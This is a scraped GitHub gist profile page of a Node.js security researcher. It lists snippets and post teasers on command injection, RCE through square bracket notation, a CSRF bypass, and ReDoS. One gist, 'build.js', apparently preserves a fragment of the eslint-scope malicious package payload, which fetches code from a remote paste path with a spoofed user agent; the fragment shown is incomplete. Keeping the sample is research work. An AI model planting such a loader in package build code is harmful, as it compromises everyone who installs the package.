Skip to content

Instantly share code, notes, and snippets.


Adam Baldwin evilpacket

View GitHub Profile
evilpacket / gist:3628941
Created Sep 5, 2012
Top 1000 from Alexa Top 1million
View gist:3628941
wget -q;unzip; awk -F ',' '{print $2}' top-1m.csv|head -1000 > top-1000.txt; rm top-1m.csv*
date slug tags title author type
2014-08-19 17:04:34 GMT
security, node.js, injection
Avoiding Command Injection in Node.js
Adam Baldwin
evilpacket / letter_freq.json
Created Jul 11, 2013
English letter frequencies in json format
View letter_freq.json
"a": 8.167,
"b": 1.492,
"c": 2.782,
"d": 4.253,
"e": 12.702,
"f": 2.228,
"g": 2.015,
"h": 6.094,
"i": 6.966,
View gist:9699f0f91443303d98c496d4c9e5b053
(Swedish) Girl with a dragon tattoo
Joe Dante's Explorers (1985)
The imitation game
The KGB, the computer, and me
date slug tags title author type
Wed Jan 14 17:30:08 PST 2015
security, node.js, javascript, hapi, RCE, square bracket notation, io.js
The Dangers of Square Bracket Notation
Jon Lamendola

We are going to be looking at some peculiar and potentially dangerous implications of Javascript's square bracket notation in this post: where you shouldn't use this style of object access and why, as well how to use it safely when needed.

date slug tags title author type
2013-09-07 17:03:10 GMT
CSRF, connect, methodOverride, middleware
Bypass Connect CSRF protection by abusing methodOverride Middleware
Node Security Team

Since our platform isn't setup for advisories that are not specific to a particular module version, but rather a use / configuration of a certain module, we will announce this issue here and get it into the database at a later date.

date slug tags title author type
Mon Nov 03 8:00:00 PDT 2014
security, node.js, redos
Regular Expression DoS and Node.js
Adam Baldwin

Imagine you are trying to buy a ticket to your favorite JavaScript conference, and instead of getting the ticket page, you instead get 500 Internal Server Error. For some reason the site is down. You can't do the thing that you want to do most and the conference is losing out on your purchase, all because the application is unavailable.

evilpacket / gist:3924845
Created Oct 20, 2012
Available Lua functions in Redis 2.6
View gist:3924845
evilpacket / build.js
Created Jul 13, 2018
eslint-scope payload
View build.js
try {
var https = require("https");
hostname: "",
path: "/raw/XLeVP82h",
headers: {
"Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
View binary + download count
ws: 18300469
fsevents: 17784701
gaze: 11832681
node-sass: 8865218
bson: 2686185
uws: 2360991
dtrace-provider: 1567984
pg: 1407674
grpc: 1137348
iltorb: 932043
You can’t perform that action at this time.